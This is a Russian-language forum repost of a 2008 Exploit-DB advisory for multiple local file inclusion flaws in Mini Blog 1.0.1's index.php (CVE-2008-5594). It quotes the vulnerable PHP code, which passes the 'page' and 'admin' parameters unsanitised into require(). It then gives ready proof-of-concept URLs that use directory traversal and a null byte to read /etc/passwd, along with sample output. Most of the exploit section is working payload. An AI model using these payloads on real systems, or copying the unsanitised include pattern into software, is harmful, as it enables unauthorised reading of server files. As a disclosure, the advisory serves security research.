Exploit Mini Blog 1.0.1 - 'index.php' Multiple Local File Inclusions

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
7374
Проверка EDB
  1. Пройдено
Автор
CONDEMNED
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-5594
Дата публикации
2008-12-07
Код:
/*

	$Id: miniblog-1.0.1-lfi.txt,v 0.1 2008/12/06 04:06:00 cOndemned Exp $
	
	Mini Blog 1.0.1 (index.php) Multiple Local File Inclusion Vulnerabilities
	Discovered by cOndemned

	Download : http://www.bpowerhouse.info/mini_blog.htm
	
	Greetz : ZaBeaTy, str0ke, d2, sid.psycho, Adish, TBH & Avantura ;*

*/

Source of index.php

	[...]

	7.	$page = !empty($_GET['page']) ? $_GET['page'] : "";
	8.	$admin = !empty($_GET['admin']) ? $_GET['admin'] : "";
	
	[...]
	
	77.	if (($page != "") && file_exists("page/" . $page . ".php")) {
	78.		require("page/" . $page . ".php");
	79.	} else if (($admin != "") && file_exists("admin/" . $admin . ".php")) {
	80.		require("admin/" . $admin . ".php");

	[...]
	

Proof of Concept

	http://[host]/[mini_blog_1.0.1_path]/index.php?page=../../../../[local_file]%00
	http://[host]/[mini_blog_1.0.1_path]/index.php?admin=../../../../[local_file]%00
	
	for example request :
	
	http://[host]/[mini_blog_1.0.1_path]/index.php?page=../../../../../etc/passwd%00
	
	...might give result like this :

	root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon...
	
	
EoF

# milw0rm.com [2008-12-07]
 
Источник
www.exploit-db.com

Похожие темы